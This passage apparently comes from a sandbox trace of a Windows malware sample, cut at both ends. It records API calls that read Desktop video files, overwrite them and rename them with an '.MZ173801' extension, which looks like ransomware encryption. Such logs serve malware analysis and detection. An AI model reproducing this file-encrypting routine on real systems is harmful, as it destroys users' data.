ERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.158] GetCurrentThreadId () returned 0x1358 [0123.158] GetCurrentThreadId () returned 0x1358 [0123.158] GetCurrentThreadId () returned 0x1358 [0123.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JA9a6Ju2ZS4.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ja9a6ju2zs4.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.158] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.158] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.158] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x996b [0123.158] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.158] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x996b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x996b, lpOverlapped=0x0) returned 1 [0123.159] CloseHandle (hObject=0x410) returned 1 [0123.160] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JA9a6Ju2ZS4.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ja9a6ju2zs4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.161] WriteFile (in: hFile=0x410, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x996b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f9bc*=0x996b, lpOverlapped=0x0) returned 1 [0123.162] CloseHandle (hObject=0x410) returned 1 [0123.162] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\JA9a6Ju2ZS4.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ja9a6ju2zs4.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\JA9a6Ju2ZS4.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\ja9a6ju2zs4.mkv.mz173801")) returned 1 [0123.163] GetCurrentThreadId () returned 0x1358 [0123.163] GetCurrentThreadId () returned 0x1358 [0123.163] GetCurrentThreadId () returned 0x1358 [0123.163] GetCurrentThreadId () returned 0x1358 [0123.163] GetCurrentThreadId () returned 0x1358 [0123.163] GetCurrentThreadId () returned 0x1358 [0123.163] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cb4120, ftCreationTime.dwHighDateTime=0x1d5e8c9, ftLastAccessTime.dwLowDateTime=0x214954a0, ftLastAccessTime.dwHighDateTime=0x1d5ecb4, ftLastWriteTime.dwLowDateTime=0x214954a0, ftLastWriteTime.dwHighDateTime=0x1d5ecb4, nFileSizeHigh=0x0, nFileSizeLow=0x19d1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Jkjm6i_saVP.avi", cAlternateFileName="JKJM6I~1.AVI")) returned 1 [0123.163] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.163] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.163] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Jkjm6i_saVP.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\jkjm6i_savp.avi"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cb4120, ftCreationTime.dwHighDateTime=0x1d5e8c9, ftLastAccessTime.dwLowDateTime=0x214954a0, ftLastAccessTime.dwHighDateTime=0x1d5ecb4, ftLastWriteTime.dwLowDateTime=0x214954a0, ftLastWriteTime.dwHighDateTime=0x1d5ecb4, nFileSizeHigh=0x0, nFileSizeLow=0x19d1)) returned 1 [0123.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.212] GetCurrentThreadId () returned 0x1358 [0123.212] GetCurrentThreadId () returned 0x1358 [0123.212] GetCurrentThreadId () returned 0x1358 [0123.212] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.212] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.213] GetCurrentThreadId () returned 0x1358 [0123.213] GetCurrentThreadId () returned 0x1358 [0123.213] GetCurrentThreadId () returned 0x1358 [0123.213] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Jkjm6i_saVP.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\jkjm6i_savp.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.213] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.213] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.213] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x19d1 [0123.213] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.213] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x19d1, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x19d1, lpOverlapped=0x0) returned 1 [0123.214] CloseHandle (hObject=0x410) returned 1 [0123.214] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Jkjm6i_saVP.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\jkjm6i_savp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.215] WriteFile (in: hFile=0x410, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x19d1, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x19d1, lpOverlapped=0x0) returned 1 [0123.216] CloseHandle (hObject=0x410) returned 1 [0123.216] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Jkjm6i_saVP.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\jkjm6i_savp.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Jkjm6i_saVP.avi.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\jkjm6i_savp.avi.mz173801")) returned 1 [0123.217] GetCurrentThreadId () returned 0x1358 [0123.217] GetCurrentThreadId () returned 0x1358 [0123.217] GetCurrentThreadId () returned 0x1358 [0123.217] GetCurrentThreadId () returned 0x1358 [0123.217] GetCurrentThreadId () returned 0x1358 [0123.217] GetCurrentThreadId () returned 0x1358 [0123.217] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d7eac40, ftCreationTime.dwHighDateTime=0x1d5ec24, ftLastAccessTime.dwLowDateTime=0x9bb03fd0, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x9bb03fd0, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0xf1c8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="n4HyEznF.mkv", cAlternateFileName="")) returned 1 [0123.217] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.217] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.217] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\n4HyEznF.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\n4hyeznf.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d7eac40, ftCreationTime.dwHighDateTime=0x1d5ec24, ftLastAccessTime.dwLowDateTime=0x9bb03fd0, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x9bb03fd0, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0xf1c8)) returned 1 [0123.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMz